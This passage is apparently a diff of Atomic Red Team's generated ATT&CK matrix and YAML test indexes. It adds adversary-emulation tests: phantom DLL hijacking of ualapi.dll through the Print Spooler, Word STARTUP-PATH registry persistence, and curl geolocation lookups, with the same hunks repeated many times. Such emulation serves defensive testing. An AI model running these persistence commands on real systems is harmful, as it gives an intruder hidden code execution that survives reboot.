+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -29,7 +29,7 @@
 |  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  |  |  | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Password Policy Discovery](../../T1201/T1201.md) |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -38,7 +38,7 @@
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Application Access Token](../../T1528/T1528.md) | [Query Registry](../../T1012/T1012.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
-|  |  | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Service Discovery](../../T1526/T1526.md) |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -33,7 +33,7 @@
 |  |  | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Indirect Command Execution](../../T1202/T1202.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  |  | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -52249,6 +52249,7 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
+      identifier: T1614
    atomic_tests: []
  T1518.001:
    technique:
@@ -51390,6 +51390,7 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
+      identifier: T1614
    atomic_tests: []
  T1518.001:
    technique:
@@ -50847,6 +50847,7 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
+      identifier: T1614
    atomic_tests: []
  T1518.001:
    technique:
@@ -50673,6 +50673,7 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
+      identifier: T1614
    atomic_tests: []
  T1518.001:
    technique:
@@ -51502,6 +51502,7 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
+      identifier: T1614
    atomic_tests: []
  T1518.001:
    technique:
@@ -51488,6 +51488,7 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
+      identifier: T1614
    atomic_tests: []
  T1518.001:
    technique:
@@ -51213,6 +51213,7 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
+      identifier: T1614
    atomic_tests: []
  T1518.001:
    technique:
@@ -5984,6 +5984,27 @@ defense-evasion:
          del %APPDATA%\WinAppXRT.dll
        name: command_prompt
        elevation_required: true
+    - name: Phantom Dll Hijacking - ualapi.dll
+      auto_generated_guid: 5898902d-c5ad-479a-8545-6f5ab3cfc87f
+      description: |
+        Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
+        A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
+
+        Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
+        Print Spooler service is also configured to auto start. Reboot of system is required
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
+          ren %APPDATA%\amsi.dll ualapi.dll
+          copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
+          sc config Spooler start=auto
+        cleanup_command: |
+          del %windir%\System32\ualapi.dll
+          del %APPDATA%\ualapi.dll
+        name: command_prompt
+        elevation_required: true
  T1553.001:
    technique:
      modified: '2022-11-08T14:00:00.188Z'
@@ -36161,6 +36182,27 @@ privilege-escalation:
          del %APPDATA%\WinAppXRT.dll
        name: command_prompt
        elevation_required: true
+    - name: Phantom Dll Hijacking - ualapi.dll
+      auto_generated_guid: 5898902d-c5ad-479a-8545-6f5ab3cfc87f
+      description: |
+        Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
+        A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
+
+        Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
+        Print Spooler service is also configured to auto start. Reboot of system is required
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
+          ren %APPDATA%\amsi.dll ualapi.dll
+          copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
+          sc config Spooler start=auto
+        cleanup_command: |
+          del %windir%\System32\ualapi.dll
+          del %APPDATA%\ualapi.dll
+        name: command_prompt
+        elevation_required: true
  T1574.014:
    technique:
      modified: '2024-04-18T15:03:32.158Z'
@@ -45404,6 +45446,22 @@ privilege-escalation:
          Server\AddIns\TestDVCPlugin" /f
        name: command_prompt
        elevation_required: true
+    - name: Persistence using STARTUP-PATH in MS-WORD
+      auto_generated_guid: f0027655-25ef-47b0-acaf-3d83d106156c
+      description: |-
+        When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\<version>\Word\Options\STARTUP-PATH and if it exists,
+        it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx
+        The registry key can be abused to load malware from the mentioned path. Reboot might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKCU\Software\Microsoft\Office\16.0\Word\Options" /v STARTUP-PATH
+          /t REG_SZ /d "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent"
+          /f
+        cleanup_command: reg delete HKCU\Software\Microsoft\Office\16.0\Word\Options
+          /v STARTUP-PATH /f
+        name: command_prompt
+        elevation_required: true
  T1546.004:
    technique:
      x_mitre_platforms:
@@ -59960,6 +60018,27 @@ persistence:
          del %APPDATA%\WinAppXRT.dll
        name: command_prompt
        elevation_required: true
+    - name: Phantom Dll Hijacking - ualapi.dll
+      auto_generated_guid: 5898902d-c5ad-479a-8545-6f5ab3cfc87f
+      description: |
+        Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
+        A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
+
+        Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
+        Print Spooler service is also configured to auto start. Reboot of system is required
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
+          ren %APPDATA%\amsi.dll ualapi.dll
+          copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
+          sc config Spooler start=auto
+        cleanup_command: |
+          del %windir%\System32\ualapi.dll
+          del %APPDATA%\ualapi.dll
+        name: command_prompt
+        elevation_required: true
  T1137.006:
    technique:
      x_mitre_platforms:
@@ -69283,6 +69362,22 @@ persistence:
          Server\AddIns\TestDVCPlugin" /f
        name: command_prompt
        elevation_required: true
+    - name: Persistence using STARTUP-PATH in MS-WORD
+      auto_generated_guid: f0027655-25ef-47b0-acaf-3d83d106156c
+      description: |-
+        When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\<version>\Word\Options\STARTUP-PATH and if it exists,
+        it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx
+        The registry key can be abused to load malware from the mentioned path. Reboot might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKCU\Software\Microsoft\Office\16.0\Word\Options" /v STARTUP-PATH
+          /t REG_SZ /d "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent"
+          /f
+        cleanup_command: reg delete HKCU\Software\Microsoft\Office\16.0\Word\Options
+          /v STARTUP-PATH /f
+        name: command_prompt
+        elevation_required: true
  T1546.004:
    technique:
      x_mitre_platforms:
@@ -105061,7 +105156,65 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
+      identifier: T1614
+    atomic_tests:
+    - name: Get geolocation info through IP-Lookup services using curl Windows
+      auto_generated_guid: fe53e878-10a3-477b-963e-4367348f5af5
+      description: 'Get geolocation info through IP-Lookup services using curl Windows.
+        The default URL of the IP-Lookup service is https://ipinfo.io/. References:
+        https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        ip_lookup_url:
+          description: URL of the IP-Lookup service
+          type: url
+          default: https://ipinfo.io/
+        curl_path:
+          description: path to curl.exe
+          type: path
+          default: C:\Windows\System32\Curl.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Curl must be installed on system.
+
+          '
+        prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://curl.se/windows/dl-8.4.0_6/curl-8.4.0_6-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
+          Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
+          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-8.4.0_6-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: "#{curl_path} -k #{ip_lookup_url}\n"
+    - name: Get geolocation info through IP-Lookup services using curl freebsd, linux
+        or macos
+      auto_generated_guid: 552b4db3-8850-412c-abce-ab5cc8a86604
+      description: 'Get geolocation info through IP-Lookup services using curl Windows.
+        The default URL of the IP-Lookup service is https://ipinfo.io/. References:
+        https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        ip_lookup_url:
+          description: URL of the IP-Lookup service
+          type: url
+          default: https://ipinfo.io/
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'curl -k #{ip_lookup_url}
+
+          '
  T1518.001:
    technique:
      modified: '2024-04-16T00:15:53.303Z'
@@ -62050,7 +62050,30 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
+      identifier: T1614
+    atomic_tests:
+    - name: Get geolocation info through IP-Lookup services using curl freebsd, linux
+        or macos
+      auto_generated_guid: 552b4db3-8850-412c-abce-ab5cc8a86604
+      description: 'Get geolocation info through IP-Lookup services using curl Windows.
+        The default URL of the IP-Lookup service is https://ipinfo.io/. References:
+        https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        ip_lookup_url:
+          description: URL of the IP-Lookup service
+          type: url
+          default: https://ipinfo.io/
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'curl -k #{ip_lookup_url}
+
+          '
  T1518.001:
    technique:
      modified: '2024-04-16T00:15:53.303Z'
@@ -57086,7 +57086,30 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
+      identifier: T1614
+    atomic_tests:
+    - name: Get geolocation info through IP-Lookup services using curl freebsd, linux
+        or macos
+      auto_generated_guid: 552b4db3-8850-412c-abce-ab5cc8a86604
+      description: 'Get geolocation info through IP-Lookup services using curl Windows.
+        The default URL of the IP-Lookup service is https://ipinfo.io/. References:
+        https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        ip_lookup_url:
+          description: URL of the IP-Lookup service
+          type: url
+          default: https://ipinfo.io/
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'curl -k #{ip_lookup_url}
+
+          '
  T1518.001:
    technique:
      modified: '2024-04-16T00:15:53.303Z'
@@ -51043,6 +51043,7 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
+      identifier: T1614
    atomic_tests: []
  T1518.001:
    technique:
@@ -50673,6 +50673,7 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
+      identifier: T1614
    atomic_tests: []
  T1518.001:
    technique:
@@ -4554,6 +4554,27 @@ defense-evasion:
          del %APPDATA%\WinAppXRT.dll
        name: command_prompt
        elevation_required: true
+    - name: Phantom Dll Hijacking - ualapi.dll
+      auto_generated_guid: 5898902d-c5ad-479a-8545-6f5ab3cfc87f
+      description: |
+        Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
+        A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
+
+        Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
+        Print Spooler service is also configured to auto start. Reboot of system is required
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
+          ren %APPDATA%\amsi.dll ualapi.dll
+          copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
+          sc config Spooler start=auto
+        cleanup_command: |
+          del %windir%\System32\ualapi.dll
+          del %APPDATA%\ualapi.dll
+        name: command_prompt
+        elevation_required: true
  T1553.001:
    technique:
      modified: '2022-11-08T14:00:00.188Z'
@@ -30228,6 +30249,27 @@ privilege-escalation:
          del %APPDATA%\WinAppXRT.dll
        name: command_prompt
        elevation_required: true
+    - name: Phantom Dll Hijacking - ualapi.dll
+      auto_generated_guid: 5898902d-c5ad-479a-8545-6f5ab3cfc87f
+      description: |
+        Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
+        A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
+
+        Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
+        Print Spooler service is also configured to auto start. Reboot of system is required
+      supported_platforms:
+      - windows
+      executor:
+        command: |
